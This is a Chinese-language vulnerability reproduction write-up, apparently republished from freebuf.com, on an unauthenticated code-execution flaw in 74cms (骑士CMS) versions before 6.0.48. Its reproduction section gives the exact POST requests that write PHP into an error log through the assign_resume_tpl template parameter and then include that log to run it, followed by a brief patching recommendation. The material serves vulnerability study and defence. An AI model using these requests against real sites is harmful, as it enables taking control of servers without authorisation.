0x00简介

骑士cms人才系统，是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。

0x01漏洞概述

骑士CMS某些函数存在过滤不严格，攻击者通过构造恶意请求，配合文件包含漏洞可在无需登录的情况下执行任意代码，甚至会照成控制服务器等严重漏洞。

0x02影响版本

骑士 CMS < 6.0.48

0x03环境搭建

环境：windows2008R2+phpstudy

1.cms下载，在骑士cms官网下载6.0.20版本

下载链接：http://www.74cms.com/download/index.html

2.下载完成后解压放入WWW目录下安装

3.根据自己的配置，安装骑士cms

0x04漏洞复现

1.访问网站首页，在url处输入一下链接漏洞页面

index.php?m=home&a=assign_resume_tpl

2.使用post发送一下请求

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名=”info” 企业id=”$_GET[‘id’]”/>

3.在骑士cms安装目录data\Runtime\Logs\Home查看日志发现已经记录了错误信息

4.使用post发送以下请求包含日志，日志名称就是当天的年月日，直接包含即可

variable=1&tpl=data/Runtime/Logs/Home/当天年月日.log

0x05修复建议

1. 在骑士cms官网下载最新的补丁包

下载地址：http://www.74cms.com/download/index.html

来源：freebuf.com 2020-12-22 17:44:38 by: 东塔安全学院